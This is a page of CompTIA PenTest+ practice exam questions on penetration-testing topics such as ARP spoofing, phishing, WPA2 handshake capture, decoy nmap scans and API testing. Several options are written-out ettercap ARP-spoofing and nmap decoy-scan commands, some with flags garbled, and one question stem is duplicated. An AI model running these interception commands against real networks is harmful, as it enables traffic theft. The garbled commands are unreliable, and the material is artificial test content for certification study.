Comptia (PT0-001) Exam Questions And Answers page 8
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?
Executive summary
Technical summary
Main body
Penetration Testing Tools
Reporting and Communication
A penetration tester is outside of an organization's network and is attempting to redirect users to a fake password reset website hosted on the penetration tester's box. Which of the following techniques is suitable to attempt this?
Employ NBNS poisoning.
Perform ARP spoofing.
Conduct a phishing campaign.
Use an SSL downgrade attack.
Attacks and Exploits
Penetration Testing Tools
A penetration tester is performing a black-box test of a client web application, and the scan host is unable to access it. The client has sent screenshots showing the system is functioning correctly. Which of the following is MOST likely the issue?
The penetration tester was not provided with a WSDL file.
The penetration tester needs an OAuth bearer token.
The tester has provided an incorrect password for the application.
An IPS/WAF whitelist is in place to protect the environment.
Attacks and Exploits
Penetration Testing Tools
A penetration tester is performing a code review. Which of the following testing techniques is being performed?
Dynamic analysis
Fuzzing analysis
Static analysis
Run-time analysis
Planning and Scoping
Penetration Testing Tools
A penetration tester is performing a remote internal penetration test by connecting to the testing system from the Internet via a reverse SSH tunnel. The testing system has been placed on a general user subnet with an IP address of 192.168.1.13 and a gateway of 192.168.1.1. Immediately after running the command below, the penetration tester s SSH connection to the testing platform drops:
Which of the following ettercap commands should the penetration tester use in the future to perform ARP spoofing while maintaining a reliable connection?
Which of the following ettercap commands should the penetration tester use in the future to perform ARP spoofing while maintaining a reliable connection?
# sudo ettercap Tq w output.cap M ARP /192.168.1.0/ /192.168.1.255/
# proxychains ettercap Tq w output.cap M ARP /192.168.1.13/ /192.168.1.1/
# ettercap Tq w output.cap M ARP 00:00:00:00:00:00//80 FF:FF:FF:FF:FF:FF//80
# ettercap safe-mode Tq w output.cap M ARP /192.168.1.2 255/ /192.168.1.13/
# ettercap Tq w output.cap M ARP /192.168.1.2 12;192.168.1.14 255/ /192.168.1.1/
Attacks and Exploits
Penetration Testing Tools
A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?
MAC address of the client
MAC address of the domain controller
MAC address of the web server
MAC address of the gateway
Attacks and Exploits
Penetration Testing Tools
A penetration tester is performing a wireless penetration test. Which of the following are some vulnerabilities that might allow the penetration tester to easily and quickly access a WPA2-protected access point?
Deauthentication attacks against an access point can allow an opportunity to capture the four-way handshake, which can be used to obtain and crack the encrypted password.
Injection of customized ARP packets can generate many initialization vectors quickly, making it faster to crack the password, which can then be used to connect to the WPA2-protected access point.
Weak implementations of the WEP can allow pin numbers to be guessed quickly, which can then be used to retrieve the password, which can then be used to connect to the WEP-protected access point.
Rainbow tables contain all possible password combinations, which can be used to perform a brute-force password attack to retrieve the password, which can then be used to connect to the WPA2-protected access point.
Attacks and Exploits
Penetration Testing Tools
A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability scan.
The tester runs the following command:
nmap -D 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130
Which of the following BEST describes why multiple IP addresses are specified?
The tester runs the following command:
nmap -D 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130
Which of the following BEST describes why multiple IP addresses are specified?
The network is subnetted as a/25 or greater, and the tester needed to access hosts on two different subnets.
The tester is trying to perform a more stealthy scan by including several bogus addresses.
The scanning machine has several interfaces to balance the scan request across at the specified rate.
A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host.
Information Gathering and Vulnerability Identification
Penetration Testing Tools
A penetration tester is planning to conduct a distributed dictionary attack on a government domain against the login portal. The tester will leverage multiple proxies to mask the origin IPs of the attack. Which of the following threat actors will be emulated?
APT
Hacktivist
Script kiddie
Insider threat
Attacks and Exploits
Penetration Testing Tools
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?
Nikto
WAR
W3AF
Swagger
Information Gathering and Vulnerability Identification
Penetration Testing Tools
Comments